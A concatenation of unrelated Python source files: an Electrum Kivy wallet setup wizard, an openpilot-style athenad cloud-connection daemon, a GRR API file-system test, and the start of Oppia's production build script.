class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, storage, db):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, db=None, aborted=False):
if storage is None and not aborted:
storage, db = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage, db)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def choice_and_line_dialog(self, **kwargs): ChoiceLineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pw, pw):
assert old_pw is None
run_next(pw, True)
def on_failure():
self.show_error(_('Password mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(
app,
check_password=lambda x:True,
on_success=on_success,
on_failure=on_failure,
is_change=True,
is_password=True,
message=_('Choose a password'))
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import queue
import random
import select
import socket
import subprocess
import sys
import tempfile
import threading
import time
from collections import namedtuple
from datetime import datetime
from functools import partial
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import (ABNF, WebSocketException, WebSocketTimeoutException,
create_connection)
import cereal.messaging as messaging
from cereal import log
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.file_helpers import CallbackReader
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.statsd import STATS_DIR
from selfdrive.swaglog import SWAGLOG_DIR, cloudlog
from selfdrive.version import get_commit, get_origin, get_short_branch, get_version
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.api.retropilot.org')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
MAX_AGE = 31 * 24 * 3600 # seconds
WS_FRAME_SIZE = 4096
NetworkType = log.DeviceState.NetworkType
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress', 'allow_cellular'], defaults=(0, False, 0, False))
cur_upload_items: Dict[int, Any] = {}
class AbortTransferException(Exception):
pass
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event, increase_count: bool = True) -> None:
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
new_retry_count = item.retry_count + 1 if increase_count else item.retry_count
item = item._replace(
retry_count=new_retry_count,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
def upload_handler(end_event: threading.Event) -> None:
sm = messaging.SubMaster(['deviceState'])
tid = threading.get_ident()
cellular_unmetered = Params().get_bool("CellularUnmetered")
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
# Remove item if too old
age = datetime.now() - datetime.fromtimestamp(cur_upload_items[tid].created_at / 1000)
if age.total_seconds() > MAX_AGE:
cloudlog.event("athena.upload_handler.expired", item=cur_upload_items[tid], error=True)
continue
# Check if uploading over cell is allowed
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular) and (not cellular_unmetered):
retry_upload(tid, end_event, False)
continue
try:
def cb(sz, cur):
# Abort transfer if connection changed to cell after starting upload
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular) and (not cellular_unmetered):
raise AbortTransferException
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
network_type = sm['deviceState'].networkType.raw
fn = cur_upload_items[tid].path
try:
sz = os.path.getsize(fn)
except OSError:
sz = -1
cloudlog.event("athena.upload_handler.upload_start", fn=fn, sz=sz, network_type=network_type)
response = _do_upload(cur_upload_items[tid], cb)
if response.status_code not in (200, 201, 403, 412):
cloudlog.event("athena.upload_handler.retry", status_code=response.status_code, fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
else:
cloudlog.event("athena.upload_handler.success", fn=fn, sz=sz, network_type=network_type)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError):
cloudlog.event("athena.upload_handler.timeout", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
except AbortTransferException:
cloudlog.event("athena.upload_handler.abort", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event, False)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
return uploadFilesToUrls([{
"fn": fn,
"url": url,
"headers": headers,
}])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
items = []
failed = []
for file in files_data:
fn = file.get('fn', '')
if len(fn) == 0 or fn[0] == '/' or '..' in fn or 'url' not in file:
failed.append(fn)
continue
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
failed.append(fn)
continue
item = UploadItem(
path=path,
url=file['url'],
headers=file.get('headers', {}),
created_at=int(time.time() * 1000),
id=None,
allow_cellular=file.get('allow_cellular', False),
)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
items.append(item._asdict())
UploadQueueCache.cache(upload_queue)
resp = {"enqueued": len(items), "items": items}
if failed:
resp["failed"] = failed
return resp
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
if not isinstance(upload_id, list):
upload_id = [upload_id]
uploading_ids = {item.id for item in list(upload_queue.queue)}
cancelled_ids = uploading_ids.intersection(upload_id)
if len(cancelled_ids) == 0:
return 404
cancelled_uploads.update(cancelled_ids)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
@dispatcher.add_method
def setBandwithLimit(upload_speed_kbps, download_speed_kbps):
if not TICI:
return {"success": 0, "error": "only supported on comma three"}
try:
HARDWARE.set_bandwidth_limit(upload_speed_kbps, download_speed_kbps)
return {"success": 1}
except subprocess.CalledProcessError as e:
return {"success": 0, "error": "failed to set limit", "stdout": e.stdout, "stderr": e.stderr}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import jpeg_write, snapshot
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
while not end_event.is_set():
last_scan = 0
curr_scan = sec_since_boot()
try:
if curr_scan - last_scan > 10:
stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
if len(stat_filenames) > 0:
stat_path = os.path.join(STATS_DIR, stat_filenames[0])
with open(stat_path) as f:
jsonrpc = {
"method": "storeStats",
"params": {
"stats": f.read()
},
"jsonrpc": "2.0",
"id": stat_filenames[0]
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
os.remove(stat_path)
last_scan = curr_scan
except Exception:
cloudlog.exception("athena.stat_handler.exception")
time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = low_priority_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.retropilot.org/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
vfs_test.py
|
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""Tests for API client and VFS-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import threading
import time
import zipfile
from grr_response_core.lib import flags
from grr_response_core.lib import rdfvalue
from grr_response_proto.api import vfs_pb2
from grr_response_server import aff4
from grr_response_server.gui import api_e2e_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class ApiClientLibVfsTest(api_e2e_test_lib.ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibVfsTest, self).setUp()
self.client_urn = self.SetupClient(0)
fixture_test_lib.ClientFixture(self.client_urn, self.token)
def testGetFileFromRef(self):
file_ref = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
self.assertEqual(file_ref.path, "fs/os/c/Downloads/a.txt")
file_obj = file_ref.Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads/a.txt")
self.assertFalse(file_obj.is_directory)
self.assertEqual(file_obj.data.name, "a.txt")
def testGetFileForDirectory(self):
file_obj = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads").Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads")
self.assertTrue(file_obj.is_directory)
def testListFiles(self):
files_iter = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").ListFiles()
files_list = list(files_iter)
self.assertEqual(
sorted(f.data.name for f in files_list),
sorted(
[u"a.txt", u"b.txt", u"c.txt", u"d.txt", u"sub1", u"中国新闻网新闻中.txt"]))
def testGetBlob(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetBlobUnicode(self):
aff4.FACTORY.Copy("aff4:/C.1000000000000000/fs/tsk/c/bin/bash",
"aff4:/C.1000000000000000/fs/tsk/c/bin/中国新闻网新闻中")
out = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
u"fs/tsk/c/bin/中国新闻网新闻中").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetFilesArchive(self):
zip_stream = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin").GetFilesArchive().WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertEqual(
sorted(namelist),
sorted([
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/rbash",
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/bash"
]))
def testGetVersionTimes(self):
vtimes = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").GetVersionTimes()
self.assertLen(vtimes, 1)
def testRefresh(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").Refresh()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads")
operation = f.Refresh()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testCollect(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").Collect()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testCollectWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testGetTimeline(self):
timeline = self.api.Client(
client_id=self.client_urn.Basename()).File("fs").GetTimeline()
self.assertTrue(timeline)
for item in timeline:
self.assertIsInstance(item, vfs_pb2.ApiVfsTimelineItem)
def testGetTimelineAsCsv(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs").GetTimelineAsCsv().WriteToStream(out)
self.assertTrue(out.getvalue())
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
build.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
from scripts import servers
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are corresponded hash value. The paths need to be in posix style,
# as it is interpreted by the `url-interpolation` service, which which
# interprets the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to build directory.
